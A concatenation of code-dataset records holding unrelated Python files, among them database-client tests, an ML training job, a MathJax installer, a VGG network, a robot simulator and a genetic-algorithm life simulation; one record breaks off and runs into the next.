self.assertIsInstance(instance, PgClientError)\n\n self.assertEqual(instance.message, message)\n self.assertEqual(instance.pgcode, pg_code)\n self.assertTrue(instance.diag, diag)\n self.assertIn(instance.pgerror, pg_error)\n","repo_name":"prawn-cake/pgclient","sub_path":"pgclient/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"15938405088","text":"import tempfile\n\nimport awswrangler as wr\nimport boto3\nimport joblib\nfrom cobra.evaluation import plot_variable_importance, plot_performance_curves, plot_univariate_predictor_quality, \\\n plot_correlation_matrix\nfrom cobra.model_building import univariate_selection, ForwardFeatureSelection\nfrom cobrademo.storage import s3_root, s3_prefix\nfrom cobrademo.jobs import entrypoint\n\n\n@entrypoint(\"model_training\")\ndef run(env: str, date: str):\n basetable = wr.s3.read_parquet(s3_root(env) + f\"/{date}/basetable\", dataset=True)\n 
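# NOTE: grounded in fix_types() defined below in this file — it casts pandas'\n # nullable Int64 columns to plain int64, essentially\n # basetable.astype({c: 'int64' for c in basetable.select_dtypes(include=['Int64']).columns}),\n # so the cobra selection and modelling steps see NumPy-backed integers.\n 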
basetable = fix_types(basetable)\n preselected_predictors = feature_selection(basetable)\n model = train_model(basetable, preselected_predictors)\n\n s3 = boto3.client('s3')\n key = s3_prefix(env) + f'/{date}/model.pkl'\n print(key)\n with tempfile.TemporaryFile() as fp:\n joblib.dump(model, fp)\n fp.seek(0)\n s3.put_object(Body=fp.read(), Bucket='datafy-training', Key=key)\n wr.s3.to_parquet(\n df=basetable,\n dataset=True,\n database=\"cobra\",\n path=s3_root(env) + f\"/{date}/basetable\",\n table=\"basetable\",\n mode='overwrite'\n )\n\n\ndef fix_types(basetable):\n int64_conversion = {c: 'int64' for c in basetable.select_dtypes(include=['Int64']).columns}\n basetable = basetable.astype(int64_conversion)\n return basetable\n\n\ndef feature_selection(basetable):\n target_column_name = \"target\"\n preprocessed_predictors = [\n col for col in basetable.columns.tolist() if \"_enc\" in col\n ]\n\n df_auc = univariate_selection.compute_univariate_preselection(\n target_enc_train_data=basetable[basetable[\"split\"] == \"train\"],\n target_enc_selection_data=basetable[basetable[\"split\"] == \"selection\"],\n predictors=preprocessed_predictors,\n target_column=target_column_name,\n preselect_auc_threshold=0.53,\n preselect_overtrain_threshold=0.05,\n )\n plot_univariate_predictor_quality(df_auc)\n # get a list of predictors selected by the univariate selection\n preselected_predictors = univariate_selection.get_preselected_predictors(df_auc)\n\n # compute correlations between preprocessed predictors\n df_corr = univariate_selection.compute_correlations(\n basetable[basetable[\"split\"] == \"train\"], preprocessed_predictors\n )\n plot_correlation_matrix(df_corr)\n print(\"preselected predictors: \" + \", \".join(preselected_predictors))\n return preselected_predictors\n\n\ndef train_model(basetable, preselected_predictors):\n target_column_name = \"target\"\n forward_selection = ForwardFeatureSelection(max_predictors=30,\n pos_only=True)\n\n forward_selection.fit(basetable[basetable[\"split\"] == \"train\"],\n target_column_name,\n preselected_predictors)\n\n performances = (forward_selection\n .compute_model_performances(basetable, target_column_name))\n plot_performance_curves(performances)\n\n # after plotting the performances and selecting the model,\n model = forward_selection.get_model_from_step(4)\n\n # we have chosen model with 5 variables, which we extract as follows\n final_predictors = model.predictors\n\n # we can also compute and plot the importance of each predictor in the model:\n variable_importance = model.compute_variable_importance(\n basetable[basetable[\"split\"] == \"selection\"])\n\n # this is correlation of the model score and predictor\n plot_variable_importance(variable_importance)\n return model\n","repo_name":"datamindedbe/datafy-cobrademo","sub_path":"src/cobrademo/jobs/model_training.py","file_name":"model_training.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"15221420415","text":"import json\nimport time\nfrom colearn_grpc.example_mli_factory import ExampleMliFactory\nfrom colearn_grpc.grpc_server import GRPCServer\nfrom colearn_grpc.logging import get_logger\nfrom colearn_grpc.example_grpc_learner_client import ExampleGRPCLearnerClient\n\n# Register scania models and dataloaders in the FactoryRegistry\n# pylint: disable=W0611\nimport colearn_keras.keras_scania # type:ignore # noqa: F401\n\n\n_logger = get_logger(__name__)\n\n\ndef 
test_keras_scania_with_grpc_sever():\n _logger.info(\"setting up the grpc server ...\")\n\n server_port = 34567\n server_key = \"\"\n server_crt = \"\"\n enable_encryption = False\n\n server = GRPCServer(\n mli_factory=ExampleMliFactory(),\n port=server_port,\n enable_encryption=enable_encryption,\n server_key=server_key,\n server_crt=server_crt,\n )\n\n server.run(wait_for_termination=False)\n\n time.sleep(2)\n\n client = ExampleGRPCLearnerClient(\n \"scania_client\", f\"127.0.0.1:{server_port}\", enable_encryption=enable_encryption\n )\n\n client.start()\n\n ml = client.get_supported_system()\n data_loader = \"KERAS_SCANIA\"\n model_architecture = \"KERAS_SCANIA\"\n assert data_loader in ml[\"data_loaders\"].keys()\n assert model_architecture in ml[\"model_architectures\"].keys()\n\n data_location = \"gs://colearn-public/scania/0\"\n assert client.setup_ml(\n data_loader,\n json.dumps({\"location\": data_location}),\n model_architecture,\n json.dumps({})\n )\n\n weights = client.mli_propose_weights()\n assert weights.weights is not None\n\n client.mli_accept_weights(weights)\n assert client.mli_get_current_weights().weights == weights.weights\n\n client.stop()\n server.stop()\n","repo_name":"fetchai/colearn","sub_path":"colearn_keras/test_keras_scania.py","file_name":"test_keras_scania.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"67"} +{"seq_id":"37714796990","text":"from collections import defaultdict\nN,M=map(int, input().split())\nedges=defaultdict(list)\nfor _ in range(M):\n a,b=map(int, input().split())\n edges[a-1].append(b-1)\n edges[b-1].append(a-1)\norders=[]\ntargets=[N-1-i for i in range(N)]\nwhile len(orders)>> from IPython.external.mathjax import install_mathjax\n >>> install_mathjax()\n\nFrom the command line:\n\n $ python -m IPython.external.mathjax\n\nTo a specific location:\n\n $ python -m IPython.external.mathjax -i /usr/share/\n\nwill install mathjax to /usr/share/mathjax\n\nTo install MathJax from a file you have already downloaded:\n\n $ python -m IPython.external.mathjax mathjax-xxx.tar.gz\n $ python -m IPython.external.mathjax mathjax-xxx.zip\n\nIt will not install MathJax if it is already there. Use -r to\nreplace the existing copy of MathJax.\n\nTo find the directory where IPython would like MathJax installed:\n\n $ python -m IPython.external.mathjax -d\n\n\"\"\"\nfrom __future__ import print_function\n\n\n#-----------------------------------------------------------------------------\n# Copyright (C) 2011 The IPython Development Team\n#\n# Distributed under the terms of the BSD License. 
The full license is in\n# the file COPYING, distributed as part of this software.\n#-----------------------------------------------------------------------------\n\n\n#-----------------------------------------------------------------------------\n# Imports\n#-----------------------------------------------------------------------------\n\nimport argparse\nimport os\nimport shutil\nimport sys\nimport tarfile\nimport zipfile\n\nfrom IPython.paths import get_ipython_dir\n\ntry:\n from urllib.request import urlopen # Py 3\nexcept ImportError:\n from urllib2 import urlopen\n\n#-----------------------------------------------------------------------------\n#\n#-----------------------------------------------------------------------------\n\n# Where mathjax will be installed\n\nnbextensions = os.path.join(get_ipython_dir(), 'nbextensions')\ndefault_dest = os.path.join(nbextensions, 'mathjax')\n\n# Test for access to install mathjax\n\ndef prepare_dest(dest, replace=False):\n \"\"\"prepare the destination folder for mathjax install\n \n Returns False if mathjax appears to already be installed and there is nothing to do,\n True otherwise.\n \"\"\"\n \n parent = os.path.abspath(os.path.join(dest, os.path.pardir))\n if not os.path.exists(parent):\n os.makedirs(parent)\n \n if os.path.exists(dest):\n if replace:\n print(\"removing existing MathJax at %s\" % dest)\n shutil.rmtree(dest)\n return True\n else:\n mathjax_js = os.path.join(dest, 'MathJax.js')\n if not os.path.exists(mathjax_js):\n raise IOError(\"%s exists, but does not contain MathJax.js\" % dest)\n print(\"%s already exists\" % mathjax_js)\n return False\n else:\n return True\n\n\ndef extract_tar(fd, dest):\n \"\"\"extract a tarball from filelike `fd` to destination `dest`\"\"\"\n # use 'r|gz' stream mode, because socket file-like objects can't seek:\n tar = tarfile.open(fileobj=fd, mode='r|gz')\n\n # The first entry in the archive is the top-level dir\n topdir = tar.firstmember.path\n\n # extract the archive (contains a single directory) to the destination directory\n parent = os.path.abspath(os.path.join(dest, os.path.pardir))\n tar.extractall(parent)\n\n # it will be mathjax-MathJax-, rename to just mathjax\n os.rename(os.path.join(parent, topdir), dest)\n\n\ndef extract_zip(fd, dest):\n \"\"\"extract a zip file from filelike `fd` to destination `dest`\"\"\"\n z = zipfile.ZipFile(fd, 'r')\n\n # The first entry in the archive is the top-level dir\n topdir = z.namelist()[0]\n\n # extract the archive (contains a single directory) to the static/ directory\n parent = os.path.abspath(os.path.join(dest, os.path.pardir))\n z.extractall(parent)\n\n # it will be mathjax-MathJax-, rename to just mathjax\n os.rename(os.path.join(parent, topdir), dest)\n\n\ndef install_mathjax(tag='2.4.0', dest=default_dest, replace=False, file=None, extractor=extract_tar):\n \"\"\"Download and/or install MathJax for offline use.\n\n This will install mathjax to the nbextensions dir in your IPYTHONDIR.\n\n MathJax is a ~15MB download, and ~150MB installed.\n\n Parameters\n ----------\n\n replace : bool [False]\n Whether to remove and replace an existing install.\n dest : str [IPYTHONDIR/nbextensions/mathjax]\n Where to install mathjax\n tag : str ['2.4.0']\n Which tag to download. Default is '2.4.0', the current stable release,\n but alternatives include 'v1.1a' and 'master'.\n file : file like object [ defualt to content of https://github.com/mathjax/MathJax/tarball/#{tag}]\n File handle from which to untar/unzip/... 
mathjax\n extractor : function\n Method to use to untar/unzip/... `file`\n \"\"\"\n try:\n anything_to_do = prepare_dest(dest, replace)\n except OSError as e:\n print(\"ERROR %s, require write access to %s\" % (e, dest))\n return 1\n else:\n if not anything_to_do:\n return 0\n\n if file is None:\n # download mathjax\n mathjax_url = \"https://github.com/mathjax/MathJax/archive/%s.tar.gz\" %tag\n print(\"Downloading mathjax source from %s\" % mathjax_url)\n response = urlopen(mathjax_url)\n file = response.fp\n\n print(\"Extracting to %s\" % dest)\n extractor(file, dest)\n return 0\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"\"\"Install mathjax from internet or local archive\"\"\",\n )\n\n parser.add_argument(\n '-i',\n '--install-dir',\n default=nbextensions,\n help='custom installation directory. Mathjax will be installed in here/mathjax')\n\n parser.add_argument(\n '-d',\n '--print-dest',\n action='store_true',\n help='print where mathjax would be installed and exit')\n parser.add_argument(\n '-r',\n '--replace',\n action='store_true',\n help='Whether to replace current mathjax if it already exists')\n parser.add_argument('filename',\n help=\"the local tar/zip-ball filename containing mathjax\",\n nargs='?',\n metavar='filename')\n\n pargs = parser.parse_args()\n\n dest = os.path.join(pargs.install_dir, 'mathjax')\n\n if pargs.print_dest:\n print(dest)\n return\n\n # remove/replace existing mathjax?\n replace = pargs.replace\n\n # do it\n if pargs.filename:\n fname = pargs.filename\n\n # automatically detect zip/tar - could do something based\n # on file content, but really not cost-effective here.\n if fname.endswith('.zip'):\n extractor = extract_zip\n else :\n extractor = extract_tar\n # do it\n return install_mathjax(file=open(fname, \"rb\"), replace=replace, extractor=extractor, dest=dest)\n else:\n return install_mathjax(replace=replace, dest=dest)\n\n\nif __name__ == '__main__' :\n sys.exit(main())\n\n__all__ = ['install_mathjax', 'main', 'default_dest']\n","repo_name":"pyparallel/pyparallel","sub_path":"Lib/site-packages/ipython-4.0.0-py3.3.egg/IPython/external/mathjax.py","file_name":"mathjax.py","file_ext":"py","file_size_in_byte":7153,"program_lang":"python","lang":"en","doc_type":"code","stars":579,"dataset":"github-code","pt":"67"} +{"seq_id":"34966714516","text":"NORTH = \"NORTH\"\nEAST = \"EAST\"\nWEST = \"WEST\"\nSOUTH = \"SOUTH\"\n\n\nclass robot():\n\n def __int__(self):\n print(\"hello I am checking the initial configuration\")\n\n def __init__(self, x=0, y=0, direction=\"NORTH\"):\n self.x = x\n self.y = y\n self.direction = direction\n self.directions = [\"EAST\", \"SOUTH\", \"WEST\", \"NORTH\"]\n\n def turn_right(self):\n try:\n self.direction = self.directions[self.get_index() + 1]\n except:\n self.direction = self.directions[0]\n return self.direction\n\n def turn_left(self):\n try:\n self.direction = self.directions[self.get_index() - 1]\n except:\n self.direction = self.directions[3]\n return self.direction\n\n def move(self):\n\n if (self.direction == NORTH):\n self.y += 1\n elif (self.direction == EAST):\n self.x += 1\n elif (self.direction == WEST):\n self.x -= 1\n elif (self.direction == SOUTH):\n self.y -= 1\n return self.x, self.y\n\n def check_initial_placement(self):\n x = self.x\n y = self.y\n\n if (x > 5 or y >5 ) or (x < 0 or y <0 ):\n print (\"=== robot is not placed on right dimension ==\")\n return False\n else:\n return True\n\n def decision_maker(self, command):\n if command == \"MOVE\":\n if (not 
self.check_if_robot_is_falling()):\n self.move()\n else:\n print(\"Robot is falling in this move, hence skipping and moving to next one\", self.x, self.y)\n\n if command == \"LEFT\":\n self.turn_left()\n\n if command == \"RIGHT\":\n self.turn_right()\n\n def check_if_robot_is_falling(self):\n \"\"\"\n This command is used to check if robot is falling from surface or not\n :return:\n \"\"\"\n if (self.direction == NORTH):\n if (self.y + 1 > 5):\n return True\n else:\n return False\n if (self.direction == SOUTH):\n if (self.y - 1 <= -1):\n return True\n else:\n return False\n if (self.direction == EAST):\n if (self.x + 1 > 5):\n return True\n else:\n return False\n\n if (self.direction == WEST):\n if (self.x - 1 <= -1):\n return True\n else:\n return False\n\n def get_index(self):\n return self.directions.index(self.direction)\n\n","repo_name":"prajjwal531/RobotSimulator","sub_path":"robotSimulator/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34244858321","text":"from django.shortcuts import render\nfrom rest_framework.renderers import JSONRenderer\n\njson_renderer = JSONRenderer()\n\ndef render_application(request, *, \n scripts, sub_title, app_context=None, init_menu_key=None,\n status=200\n):\n context={\n 'user': request.user,\n 'scripts': scripts,\n 'sub_title': sub_title\n }\n\n if app_context is not None:\n context['app_context'] = json_renderer.render(app_context).decode(\"utf-8\")\n \n if init_menu_key is not None:\n context['init_menu_key'] = init_menu_key\n\n return render(\n request,\n 'application.html',\n context=context,\n status=status\n )\n\ndef render_application_error(request, *, status, message, subject=None):\n return render_application(\n request, \n scripts = ['/static/js-bundle/error.js'], \n sub_title='Error',\n app_context={\n \"subject\": subject or status,\n \"message\": message\n },\n status=status\n )\n\n","repo_name":"stonezhong/sparkbase","sub_path":"server/ui/view_tools.py","file_name":"view_tools.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"47889426088","text":"#coding:utf-8\nimport torch\nimport torch.nn as nn\n\ncfg = {\n 'vgg11':[64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],\n 'vgg13':[64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],\n 'vgg16':[64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],\n 'vgg19':[64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],\n}\n\ndef VGG11(num_classes):\n return VGG('vgg11', num_classes)\n\ndef VGG13(num_classes):\n return VGG('vgg13', num_classes)\n\ndef VGG16(num_classes):\n return VGG('vgg16', num_classes)\n\ndef VGG19(num_classes):\n return VGG('vgg19', num_classes)\n\nclass VGG(nn.Module):\n\n def __init__(self, vgg_name, num_classes):\n super(VGG, self).__init__()\n self.features = self._make_layers(cfg[vgg_name])\n self.fc1 = nn.Linear(512, num_classes)\n\n def forward(self, x):\n out = self.features(x)\n out = out.view(out.size(0), -1)\n return self.fc1(out)\n\n def _make_layers(self, cfg):\n layers = []\n in_channels = 3\n for x in cfg:\n if x == 'M':\n layers += [nn.MaxPool2d(kernel_size=2, stride=2)]\n else:\n layers += [nn.Conv2d(in_channels, x, kernel_size=3, padding=1),\n nn.BatchNorm2d(x),\n nn.ReLU(inplace=True)]\n in_channels = 
x\n layers += [nn.AvgPool2d(kernel_size=1, stride=1)]\n return nn.Sequential(*layers)\n\ndef test():\n print('--- run vgg test ---')\n x = torch.randn(2,3,32,32)\n for net in [VGG11(10), VGG13(10), VGG16(10), VGG19(10)]:\n print(net)\n y = net(x)\n print(y.size())\n\n","repo_name":"iBelieveCJM/Tricks-of-Semi-supervisedDeepLeanring-Pytorch","sub_path":"architectures/vgg.py","file_name":"vgg.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":426,"dataset":"github-code","pt":"67"}
+{"seq_id":"69957076375","text":"import queue\n\nn = int(input())\na = list(map(int,input().split()))\n##first = -1\n##second = -1\n##third = -1\n##for i in range(len(a)):\n## cur = a[i]\n## if (cur > first):\n## third = second\n## second = first\n## first = cur\n## elif (cur > second):\n## third = second\n## second = cur\n## elif (cur > third):\n## third = cur\n## if (i < 2):\n## print(-1)\n## else:\n## print(first * second * third)\npq = queue.PriorityQueue()\nfor x in a:\n pq.put(-x)\nfor i in range(n):\n if (i < 2):\n print(-1)\n continue\n first = pq.get()\n second = pq.get()\n third = pq.get()\n print(-1*first*second*third)\n pq.put(first)\n pq.put(second)\n pq.put(third)\n","repo_name":"lamngue/Programming-Questions","sub_path":"Heap/MonkAndMultiplication.py","file_name":"MonkAndMultiplication.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"16640169459","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jul 16 21:15:50 2019\r\n\r\n@author: Simon\r\n\"\"\"\r\nimport numpy as np\r\nimport numexpr as ne\r\nimport time\r\n\r\nstart = time.time()\r\nimport pygame\r\n\r\nimport pyautogui\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.animation import FuncAnimation\r\n\r\n\r\nimport math\r\nimport random\r\n\r\nimport brain as br\r\nimport new_Dense as nd\r\nimport new_Dense_fitness as nd_F\r\n\r\n\r\n\r\n\r\nclass Genetic:\r\n def __init__( self, H, H2, NR_CH, MUTATION_COEFF, TRAINING):\r\n self.NR_CH = NR_CH \r\n self.H = H\r\n self.H2 = H2\r\n self.MUTATION_COEFF = MUTATION_COEFF\r\n self.TRAINING = TRAINING\r\n \r\n \r\n CH_W, CH_B, CH_money, CH_edu, CH_food, CH_fitness, CH_breed, CH_age = self.define_char(H, NR_CH)\r\n self.CH_W = CH_W\r\n self.CH_B = CH_B\r\n self.CH_money = CH_money\r\n self.CH_edu = CH_edu\r\n self.CH_food = CH_food\r\n self.CH_fitness = CH_fitness\r\n self.CH_breed = CH_breed\r\n self.CH_age = CH_age\r\n \r\n ###################\r\n ###### Breed ######\r\n ###################\r\n \"Weights determine whom gets to breed\"\r\n CH_W_2, CH_B_2, _, _, _, _, _, _ = self.define_char(H2, NR_CH, CH_W = [], CH_B = [], CH_money = [],\r\n CH_edu = [], CH_food = [], CH_fitness = [], CH_breed = [], CH_age=[])\r\n \r\n self.CH_W_2 = CH_W_2\r\n self.CH_B_2 = CH_B_2\r\n self.Breed_point = [0] * len(CH_W) #Each character earns a breed point if someone wants to breed with this character\r\n \r\n #####################\r\n ###### Fitness ######\r\n #####################\r\n self.H_3 = [6,1]\r\n CH_W_3, CH_B_3, _, _, _, _, _, _ = self.define_char(self.H_3, NR_CH, CH_W = [], CH_B = [], CH_money = [],\r\n CH_edu = [], CH_food = [], CH_fitness = [], CH_breed = [], CH_age=[])\r\n self.CH_W_3 = np.array(CH_W_3[0])\r\n self.CH_B_3 = np.array(CH_B_3[0])\r\n \r\n self.Fitness_old = [0]*NR_CH\r\n self.Fitness_new = 0\r\n \r\n self.fot = []\r\n \r\n ######################\r\n ##### Investment #####\r\n ######################\r\n 
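# NOTE: grounded in the code further down: `invest` is a shared pool that\r\n # characters pay into (their fifth action in play_game); it raises the\r\n # brood size via NR_children = 4 + int(invest / 20), capped at 10 in\r\n # breed_selector, and boosts the investor's Breed_point score.\r\n 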
self.invest = 0 #Default\r\n \r\n #####################\r\n ##### Statistic #####\r\n #####################\r\n self.TOPOP = []\r\n self.MAXM = []\r\n self.MAXE = []\r\n self.MAXFO = []\r\n self.historical_breed_point = []\r\n self.dec = []\r\n self.total_born = []\r\n self.old_pop = 0\r\n self.avg_age = []\r\n\r\n self.death_by_hunger = []\r\n self.death_by_age = []\r\n \r\n def define_char(self,H, NR_CH, CH_W = [], CH_B = [], CH_money = [],\r\n CH_edu = [], CH_food = [], CH_fitness = [], CH_breed = [], CH_age=[] ):\r\n #print(CH_W, \"hi\")\r\n start_len = len(CH_W)\r\n #print(\"length of W:\",start_len)\r\n for k in range(self.NR_CH):\r\n \r\n if start_len==0: #If empty then create new weights and biases\r\n \r\n W = [] #Create NR_CH different neural weights \r\n B = [] #Create the bias\r\n for i in range( len(H)-1): #creates 3 weight matrices\r\n W.append( np.random.random((H[i+1],H[i]))*2 -1 )\r\n #B.append( np.random.random(H[i+1])*2 -1)\r\n B.append( np.random.random((H[i+1],1))*2 -1)\r\n #creates weight matrices with weights between -1 and 1\r\n \r\n CH_W.append( W )\r\n CH_B.append( B )\r\n else:\r\n pass\r\n CH_money.append( 0 ) #All characters start with 10 credits, 0 education, 7 days worth of food and 0 fitness\r\n CH_edu.append( 0 ) \r\n CH_food.append( 200 )\r\n CH_fitness.append( 0 )\r\n CH_breed.append(0)\r\n CH_age.append(0)\r\n return CH_W, CH_B, CH_money, CH_edu, CH_food, CH_fitness, CH_breed, CH_age\r\n \r\n\r\n \r\n \r\n #def update_frame(i, POS, NR_CH):\r\n def play_game(self, t): #One character performs one update to its life\r\n #print(\"Character:\", s)\r\n H_act = [\"tanh\"] + [\"I\"]\r\n\r\n og_len = len(self.CH_food)\r\n Survived_W = []\r\n Survived_W_2 =[]\r\n Survived_B = []\r\n Survived_B_2 = []\r\n Survived_edu = []\r\n Survived_money = []\r\n Survived_food = []\r\n Survived_fitness = []\r\n Survived_age=[]\r\n Survived_breed=[]\r\n \r\n breed = 0\r\n school = 0\r\n work = 0\r\n buy = 0\r\n invest = 0\r\n nr_dead = 0\r\n \r\n train = 0\r\n \r\n print(\"Number of characters alive:\",og_len, \"... 
Time:\", t)\r\n print(\"lowest food:\", min(self.CH_food))\r\n print(\"We have invested: \", self.invest)\r\n for i in range(og_len):\r\n #print(i, \"Food:\", self.CH_food[i])\r\n \r\n if og_len==0:\r\n print(\"We're all dead!\")\r\n \r\n random_nr = int( np.random.normal(0) ) *10\r\n if self.CH_food[i] > 0 and self.CH_age[i] < 200 + random_nr:\r\n #print(\"Food:\", self.CH_food[i], i)\r\n \r\n temp = np.reshape( self.CH_W_3 , (6,1) )\r\n x = np.array([[self.CH_money[i], self.CH_edu[i], self.CH_food[i],self.invest, self.CH_age[i] ]]).T #Must be a N x 1 matrix\r\n x = np.concatenate((x, np.tanh(temp / np.average(temp)) ))\r\n \r\n x = np.reshape( x , (5+6,1) )\r\n \r\n z,choices = nd_F.feedforward(1,x, self.H, self.CH_W[i], self.CH_B[i],0, H_act)\r\n \r\n max_choice = max(choices[-1])\r\n \r\n ''' Characters choice will be taken into consideration\r\n with the importance of the s.CH_W_3 weights\r\n '''\r\n \r\n \r\n #print(max_choice, \"Choice\")\r\n if max_choice == choices[-1][0]: #First option: Go to school\r\n #print(\"Go to school\")\r\n self.CH_edu[i]+=1 #+ int( self.invest / 20 )\r\n school += 1\r\n \r\n if max_choice == choices[-1][1]: #Second option: Go to work\r\n #print(\"Go to work\")\r\n self.CH_money[i]+=2*self.CH_edu[i] +5\r\n work += 1\r\n \r\n if self.CH_edu[i] == 0:\r\n train = 1\r\n y = np.array([[1,0,0,0,0 ]]).T #We dont want the final entry to happen during this input of A\r\n\r\n \r\n elif max_choice == choices[-1][2] and self.CH_money[i] > 0: #Third option: Buy groceries\r\n self.CH_food[i] += 10 #+ int( self.invest / 20 ) #Every 10 investment points will increase food by one\r\n self.CH_money[i]-=1\r\n buy += 1\r\n \r\n elif max_choice == choices[-1][3] and self.CH_age[i]>5: #Fourth option: Breed, but only for mature enough individuals\r\n self.CH_fitness[i] += 1\r\n self.CH_breed[i] = 1 #Boolean, true or false\r\n breed += 1\r\n \r\n \r\n elif max_choice == choices[-1][4]: #Fifth option: Invest\r\n if self.CH_money[i] > 0:\r\n self.CH_money[i] -= 1\r\n self.Breed_point[ i ] += 10 #Those whom invests will gain fitness, increasing their chances of breeding\r\n self.invest += 1\r\n invest += 1\r\n# else:\r\n# y = np.array([[self.CH_money[i], self.CH_edu[i], self.CH_food[i],0,t]]).T #We dont want the final entry to happen during this input of A\r\n# for j in range(5):\r\n# self.CH_W[i], self.CH_B[i], _, _, _, _ = nd.backpropagation(self.H, choices, z, y, self.CH_W[i], self.CH_B[i], C=0, vs=0,lr=0.01,s=0,H_act=H_act, optimizer='none')\r\n# z,A = nd.feedforward(1,x, self.H, self.CH_W[i], self.CH_B[i], drop=0,H_act=H_act)\r\n \r\n else:\r\n \"The AI attempted to do one of the resource intensive objects\"\r\n train = 1\r\n y = np.array([[1,1,1,0,0]]).T\r\n\r\n if train == 1:\r\n train = 0\r\n for j in range(1):\r\n \r\n self.CH_W[i], self.CH_B[i], _ =\\\r\n nd_F.backpropagation(self.H, choices, z, y, self.CH_W[i], self.CH_B[i], C=0, vs=0,lr=0.01,s=0,H_act=H_act, optimizer='none')\r\n \r\n z,A = nd_F.feedforward(1,x, self.H, self.CH_W[i], self.CH_B[i], drop=0,H_act=H_act)\r\n \r\n \r\n \r\n self.CH_food[i]-=1 #Each day reduces food supplies by one\r\n if self.CH_food[i] > 0:\r\n self.CH_age[i]+=1\r\n \r\n if self.CH_age[i] >= 200 + random_nr:\r\n self.death_by_age[-1] += 1\r\n \r\n else:\r\n Survived_W_2.append( self.CH_W_2[i])\r\n Survived_B_2.append( self.CH_B_2[i])\r\n Survived_W.append( self.CH_W[i] )\r\n Survived_B.append( self.CH_B[i] )\r\n Survived_money.append( self.CH_money[i] )\r\n Survived_edu.append( self.CH_edu[i] )\r\n Survived_food.append( self.CH_food[i] 
)\r\n Survived_fitness.append( self.CH_fitness[i] )\r\n Survived_age.append(self.CH_age[i])\r\n #Survived_breed_point etc..\r\n \r\n \r\n else:\r\n pass\r\n #print(\"Character\", i, \" death by hunger\")\r\n nr_dead += 1\r\n self.death_by_hunger[-1] += 1\r\n else:\r\n print(\"Character\", i, \" was dead\")\r\n if self.CH_age[i] >= 200 + random_nr:\r\n print(\"You died of old age\")\r\n \r\n if self.CH_food[i] <=0:\r\n print(\"You died of hunger...\")\r\n \r\n print(\"Number of survivors:\",len(Survived_W))\r\n# print(\"School: \", school)\r\n# print(\"Work: \", work)\r\n# print(\"Buy: \", buy)# / (og_len*5))\r\n# print(\"Breed: \", breed)# / (og_len*5))\r\n# print(\"Invest: \", invest)# / (og_len*5))\r\n# print(\"Death by hunger: \", nr_dead)\r\n self.old_pop = len(self.CH_food)\r\n \r\n return Survived_W, Survived_B, Survived_W_2, Survived_B_2, Survived_money, \\\r\n Survived_edu, Survived_food, Survived_fitness, Survived_age, Survived_breed\r\n \r\n ##########################\r\n ##### Breed selector #####\r\n ##########################\r\n def breed_selector(self,Survived_W, Survived_B, Survived_W_2, Survived_B_2, Survived_money,Survived_edu, Survived_food, Survived_fitness, Survived_age, Survived_breed):\r\n \r\n H_act=[\"relu\"] + [\"I\"]\r\n Survived_breed=[]\r\n #print(len(Survived_W), \"number of survivors\")\r\n \r\n #Compile a list of potential breeders and create new characters\r\n #-Call function to breed\r\n NR_CH = len(Survived_W)\r\n \r\n NR_children = 0\r\n breed_list = [ i for i in range(NR_CH) if self.CH_breed[i]==1 ]\r\n if sum( self.CH_breed) >= 2:\r\n #print(breed_list)\r\n nr_children = int(len(breed_list)/2)\r\n #print(nr_children, \"number of children\")\r\n \r\n \r\n #New neural network for each character\r\n #Each character will decide whom to breed with\r\n #inputs, food,money,edu etc,\r\n #output: one neuron which decides whom to breed with\r\n \r\n avg_fd = 0\r\n ch_born = 0\r\n \r\n #print(breed_list, \"breed_list\")\r\n \r\n x_1 = np.array([ self.CH_money[i] for i in breed_list ])\r\n x_2 = np.array([ self.CH_food[i] for i in breed_list ])\r\n x_3 = np.array([ self.CH_edu[i] for i in breed_list ])\r\n \r\n #print(\"RATIO OF BREEDERS:\", len(x_1) / len(self.CH_money))\r\n # print(x_1)\r\n # print(x_2)\r\n # print(x_3)\r\n # print(nr_children, \"nr ch\")\r\n self.dec=[]\r\n for J in range(len(breed_list)): #Finish later\r\n \r\n x = np.array([ x_1, x_2, x_3 ]) #Must be a 3 x N matrix, N = nr of potential breeders\r\n z,choices = nd_F.feedforward(1,x, self.H2, self.CH_W_2[J], self.CH_B_2[J],0, H_act)\r\n \r\n #print(choices[-1][0], \"Your choices\")\r\n breeding_choice = np.where(choices[-1][0] == np.amax(choices[-1][0]))\r\n \r\n #print(\"Breeding pos of breed_list\",breeding_choice[0][0])\r\n chosen_ch = breed_list[int( breeding_choice[0][0] )]\r\n #print(\"Your desired breeding partner is character number: \", breed_list[int( breeding_choice[0][0] )])\r\n \r\n self.Breed_point[ chosen_ch ] += 1 #+ self.CH_fitness[ chosen_ch ]\r\n \r\n self.dec.append(choices[-1][0] )\r\n First = np.where( self.Breed_point == np.amax( self.Breed_point ))[0][0]\r\n Second = self.get_second_highest()[1]\r\n \r\n #print(First, Second)\r\n #print(self.Breed_point)\r\n par1 = First #breed_list[First] #First parent to breed\r\n par2 = Second #breed_list[Second] #second parent to breed\r\n \r\n \"Make it so that the parents can decide how many children will be born\"\r\n NR_children = 4 + 